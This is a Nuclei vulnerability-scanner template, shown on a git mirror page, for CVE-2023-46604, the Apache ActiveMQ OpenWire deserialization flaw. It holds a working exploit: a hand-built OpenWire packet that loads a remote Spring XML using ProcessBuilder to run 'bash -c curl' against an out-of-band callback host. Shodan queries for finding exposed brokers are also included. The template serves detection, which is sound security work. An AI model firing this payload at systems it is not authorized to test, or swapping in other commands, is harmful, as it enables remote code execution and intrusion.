daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/javascript/cves/2023/CVE-2023-46604.yaml

69 lines
3.4 KiB
YAML
Raw Permalink Blame History

id: CVE-2023-46604
info:
name: Apache ActiveMQ - Remote Code Execution
author: Ice3man,Mzack9999,pdresearch
severity: critical
description: |
Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
reference:
- http://www.openwall.com/lists/oss-security/2023/10/27/5
- https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
- https://github.com/X1r0z/ActiveMQ-RCE
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
- https://paper.seebug.org/3058/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-46604
cwe-id: CWE-502
epss-score: 0.97273
epss-percentile: 0.99837
cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: activemq
shodan-query:
- product:"ActiveMQ OpenWire Transport"
- cpe:"cpe:2.3:a:apache:activemq"
- product:"activemq openwire transport"
tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev
variables:
prefix: "1f00000000000000000001010042"
classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
final: "{{prefix}}{{classname}}"
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
let m1 = require('nuclei/net');
let m2 = require('nuclei/bytes');
let b = m2.Buffer();
let name=Host+':'+Port;
let conn = m1.Open('tcp', name);
let randomvar = '{{randstr}}'.toLowerCase();
var Base64={encode: btoa}
exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
packet+=(exploit_xml.length).toString(16)
packet+=(b.WriteString(exploit_xml)).Hex()
conn.SendHex(packet);
resp = conn.RecvString()
randomvar
args:
Host: "{{Host}}"
Port: "61616"
oob: "{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(interactsh_request, response)'
condition: and
# digest: 4a0a00473045022057e01ef1d30cc0a70e849e0c6fe4e8e3fbbec9965b3c00043d531726b6b2f8ca022100818d0bfc74f0746cf459838fd25f78d7b518025f549b30bb5998476e890301a0:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink